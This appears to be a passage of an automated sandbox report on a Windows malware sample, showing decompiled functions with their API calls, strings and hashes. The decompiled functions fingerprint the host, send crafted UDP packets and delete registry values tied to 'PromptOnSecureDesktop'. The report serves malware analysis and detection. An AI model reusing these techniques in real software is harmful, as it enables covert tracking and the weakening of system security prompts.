						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x73b743e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}

0x0040e65a
0x0040e664
0x0040e666
0x0040e66c
0x0040e6a9
0x0040e6b0
0x0040e6b5
0x0040e6c8
0x0040e6d0
0x0040e6d3
0x0040e6d8
0x0040e6de
0x0040e6f5
0x0040e6e0
0x0040e6e5
0x0040e6e9
0x0040e6ef
0x0040e6ef
0x0040e6f9
0x0040e6f9
0x0040e6fe
0x0040e704
0x0040e741
0x0040e743
0x0040e6b9
0x0040e6b9
0x0040e6c4
0x00000000
0x00000000
0x00000000
0x0040e706
0x0040e706
0x0040e706
0x0040e709
0x0040e70b
0x0040e70e
0x0040e715
0x0040e715
0x0040e715
0x0040e718
0x0040e71b
0x0040e72c
0x0040e72c
0x0040e72c
0x0040e732
0x00000000
0x0040e736
0x0040e722
0x0040e728
0x0040e72a
0x00000000
0x00000000
0x00000000
0x0040e72a
0x0040e710
0x0040e713
0x00000000
0x00000000
0x00000000
0x0040e737
0x0040e737
0x0040e739
0x0040e739
0x00000000
0x0040e706
0x0040e6b7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e66e
0x0040e66e
0x0040e66e
0x0040e676
0x0040e684
0x0040e68f
0x0040e699
0x0040e686
0x0040e686
0x0040e686
0x0040e69b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e69b
0x0040e69d
0x0040e69d
0x0040e69f
0x0040e6a1
0x0040e6a7
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

lstrcmpA.KERNEL32(73B743E8,00000000,?,73B743E0,00000000,?,00405EC1), ref: 0040E693
lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,73B743E0,00000000,?,00405EC1), ref: 0040E6E9
lstrcmpA.KERNEL32(?,00000008,?,73B743E0,00000000,?,00405EC1), ref: 0040E722

Strings

A, xrefs: 0040E65F, 0040E666, 0040E6CF, 0040E731
A, xrefs: 0040E6F9, 0040E6FE, 0040E739

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
String ID: A$ A
API String ID: 3343386518-686259309
Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004026FF, Relevance: 7.6, APIs: 5, Instructions: 96
networkCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400);
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

0x00402704
0x00402706
0x0040270b
0x00402715
0x00402718
0x0040271d
0x0040271e
0x0040271e
0x00402726
0x0040272e
0x00402734
0x0040273a
0x00402740
0x00402743
0x0040274e
0x00402752
0x00402754
0x0040275a
0x0040275e
0x00402764
0x00402766
0x0040276a
0x00402770
0x00402774
0x0040277a
0x0040277e
0x00402784
0x00402788
0x0040278a
0x0040278a
0x0040278d
0x004027a0
0x00402795
0x00402797
0x0040279d
0x00000000
0x0040279d
0x00000000
0x00402795
0x004027a9
0x004027ad
0x004027b9
0x004027b3
0x004027b7
0x004027b8
0x004027b8
0x004027c2
0x004027c4
0x004027c4
0x004027c5
0x004027c7
0x0040278a
0x004027ce
0x004027d2
0x004027d2
0x004027d5
0x004027d7
0x004027df
0x004027e3
0x004027e5
0x004027f0
0x00402802
0x00402815

APIs

GetTickCount.KERNEL32 ref: 0040272E
htons.WS2_32(00000001), ref: 00402752
htons.WS2_32(0000000F), ref: 004027D5
htons.WS2_32(00000001), ref: 004027E3
sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802

Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: htons$Heap$AllocateCountProcessTicksendto
String ID:
API String ID: 1128258776-0
Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718

Uniqueness

Uniqueness Score: -1.00%

Function 0040F26D, Relevance: 7.6, APIs: 5, Instructions: 63COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402419, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}

0x00402429
0x0040242b
0x0040242e
0x00402434
0x00402436
0x0040243b
0x00402474
0x00402474
0x0040243d
0x0040243d
0x00402440
0x00402442
0x00402446
0x0040244c
0x00000000
0x00000000
0x0040246b
0x00402472
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402472
0x0040247b
0x0040247b
0x00402476
0x0040247a

APIs

lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467

Strings

localcfg, xrefs: 0040241F

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$lstrcmpi
String ID: localcfg
API String ID: 1808961391-1857712256
Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98

Uniqueness

Uniqueness Score: -1.00%

Function 0223E77E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0223DF55: GetCurrentThreadId.KERNEL32 ref: 0223DFA3

GetFileSize.KERNEL32(00000000,00000000,?,00410170,?,00000000,?,0223A695), ref: 0223E7A8
ReadFile.KERNEL32(00000000,004136C4,00000000,?,00000000,?,00410170,?,00000000,?,0223A695), ref: 0223E7D3
CloseHandle.KERNEL32(00000000,?,00410170,?,00000000,?,0223A695), ref: 0223E802

Strings

PromptOnSecureDesktop, xrefs: 0223E829, 0223E82E, 0223E865, 0223E884

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCurrentHandleReadSizeThread
String ID: PromptOnSecureDesktop
API String ID: 1396056608-2980165447
Opcode ID: 405f389e53666a474e2b787b94d7c3d53998448724a3c64d4908c4d7b3540699
Instruction ID: 85ce808badeeb41e28d595303e1c8bf05eade7245e971d0f767a2f2fe3f49e0e
Opcode Fuzzy Hash: 405f389e53666a474e2b787b94d7c3d53998448724a3c64d4908c4d7b3540699
Instruction Fuzzy Hash: 0F2149F2E103017AE2267BB19C49FEB3E1DEF58750F100124FA09B51E6EAA5D8548AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E52E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t28;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;

				_t44 = __eflags;
				_t32 = __edx;
				E0040DD05();
				_t28 = E0040DBCF(_t44, 0x80000000, 3);
				_pop(_t31);
				if(_t28 == 0xffffffff) {
					L6:
					_t9 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
					_t11 = E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t9);
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {
						_t17 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t17);
						_t40 = _t40 + 0x34;
					}
					E0040EE2A(_t31, 0x4122f8, 0, 0x100);
					E0040EE2A(_t31, 0x4128f8, 0, 0x100);
					E0040DD69();
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {
					E0040DB2E(_t20);
					_t23 =  *0x4136c4;
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							E00402544( *0x4136c4,  *0x4136c4, _v4, 0xe4, 0xc8);
							E0040E332(_t32, _t48,  *0x4136c4, _v4);
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}

0x0040e52e
0x0040e52e
0x0040e533
0x0040e544
0x0040e54c
0x0040e553
0x0040e5b8
0x0040e5c7
0x0040e5ed
0x0040e5f2
0x0040e5f7
0x0040e603
0x0040e624
0x0040e629
0x0040e629
0x0040e635
0x0040e63e
0x0040e646
0x0040e653
0x0040e653
0x0040e558
0x0040e55e
0x0040e564
0x0040e567
0x0040e56c
0x0040e571
0x0040e574
0x0040e578
0x0040e583
0x0040e589
0x0040e58b
0x0040e59a
0x0040e5a9
0x0040e5ae
0x0040e5ae
0x0040e58b
0x0040e574
0x0040e5b2
0x00000000

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

GetFileSize.KERNEL32(00000000,00000000,?,73B743E0,?,00000000,?,0040A445), ref: 0040E558
ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,73B743E0,?,00000000,?,0040A445), ref: 0040E583
CloseHandle.KERNEL32(00000000,?,73B743E0,?,00000000,?,0040A445), ref: 0040E5B2

Strings

PromptOnSecureDesktop, xrefs: 0040E5D9, 0040E5DE, 0040E615, 0040E634

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
String ID: PromptOnSecureDesktop
API String ID: 3683885500-2980165447
Opcode ID: 3bd65058355bd4e2ecb8572924a34b592d2d31896256c8b5b9ec43fd4f5e839b
Instruction ID: 336cca8f28a0ae06816d6806ca3c094c6326420f96deeb8fe64773c8e7208e17
Opcode Fuzzy Hash: 3bd65058355bd4e2ecb8572924a34b592d2d31896256c8b5b9ec43fd4f5e839b
Instruction Fuzzy Hash: F321EAB19402047AE2207B639C0AFAB3D1CDF54758F10093EBA09B11E3E9BDD96082BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}

0x00401ad1
0x00401ad4
0x00401adc
0x00401b6b
0x00401b70
0x00401b70
0x00401aef
0x00401af3
0x00401b6a
0x00000000
0x00401b6a
0x00401af9
0x00401afa
0x00401afd
0x00401b00
0x00401b1c
0x00401b22
0x00401b27
0x00000000
0x00000000
0x00401b09
0x00401b12
0x00000000
0x00000000
0x00401b17
0x00401b18
0x00401b1b
0x00401b1b
0x00401b2b
0x00401b5b
0x00401b5e
0x00401b63
0x00401b68
0x00401b69
0x00000000
0x00401b69
0x00401b2d
0x00401b32
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b34
0x00401b34
0x00401b34
0x00401b37
0x00401b3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b3d
0x00401b3d
0x00401b4c
0x00401b4f
0x00401b50
0x00401b54
0x00401b54
0x00401b57
0x00000000

APIs

LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,?,?,?,00000001), ref: 00401AE9

Strings

GetAdaptersAddresses, xrefs: 00401AE3
Iphlpapi.dll, xrefs: 00401ACC

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetAdaptersAddresses$Iphlpapi.dll
API String ID: 2574300362-1087626847
Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0223764E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 022376C2
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 02237956
RegCloseKey.ADVAPI32(?), ref: 02237967

Strings

PromptOnSecureDesktop, xrefs: 022376AE, 022376B3, 022376CE

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PromptOnSecureDesktop
API String ID: 1332880857-2980165447
Opcode ID: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
Instruction ID: ddf2e48dc425ac9c485956df475168e8e0fe15e0a9dab3d5994537a39b503578
Opcode Fuzzy Hash: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
Instruction Fuzzy Hash: ED11BEF0A1020AAFDF128FA9DC45FEFBB79EB85714F144561F510EA294D7B189508F60

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}

0x00401bec
0x00401bf2
0x00401bf3
0x00401bf4
0x00401bf5
0x00401bf7
0x00401bf9
0x00401bfc
0x00401bfd
0x00401c04
0x00401c0b
0x00401c1d
0x00401c45
0x00401c51
0x00000000
0x00401c57
0x00401c1f
0x00401c24
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c26
0x00401c26
0x00401c35
0x00401c37
0x00401c38
0x00401c3f
0x00000000
0x00000000
0x00000000
0x00401c41
0x00401c5e

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,?,?,?,00000001), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401C15
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51

Strings

hi_id, xrefs: 00401BE5
localcfg, xrefs: 00401BE7

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: hi_id$localcfg
API String ID: 2777991786-2393279970
Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5

Uniqueness

Uniqueness Score: -1.00%

Function 0223994F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 02239986
RegDeleteValueA.ADVAPI32(?,00000000), ref: 022399A6
RegCloseKey.ADVAPI32(?), ref: 022399AF

Strings

PromptOnSecureDesktop, xrefs: 02239972, 02239977, 02239999, 022399BC

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: CloseDeleteOpenValue
String ID: PromptOnSecureDesktop
API String ID: 849931509-2980165447
Opcode ID: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
Instruction ID: 3aad8b3914d50bfa430d73ce86aa066b6d795262fed22462f77f45f69134ec24
Opcode Fuzzy Hash: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
Instruction Fuzzy Hash: 28F096F2680308BBF7116B94AC06FDF3A2DDB85B00F104061FA05B9095F6E59E9086B9

Uniqueness

Uniqueness Score: -1.00%

Function 004096FF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004096FF(void* __ecx) {
				void* _v8;
				char* _t6;
				char* _t10;
				void* _t23;
				void* _t24;

				_t16 = __ecx;
				_push(__ecx);
				_t6 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t24 = _t23 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t6, 0, 0x103,  &_v8) == 0) {
					_t10 = E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8);
					_t24 = _t24 + 0x14;
					RegDeleteValueA(_v8, _t10);
					RegCloseKey(_v8);
				}
				E0040EE2A(_t16, 0x4122f8, 0, 0x100);
				return 0;
			}

0x004096ff
0x00409702
0x00409728
0x0040972d
0x0040973e
0x0040974a
0x0040974f
0x00409756
0x0040975f
0x0040975f
0x0040976d
0x0040977b

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F

Strings

PromptOnSecureDesktop, xrefs: 00409704, 00409722, 00409727, 00409749, 0040976C

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseDeleteOpenValue
String ID: PromptOnSecureDesktop
API String ID: 849931509-2980165447
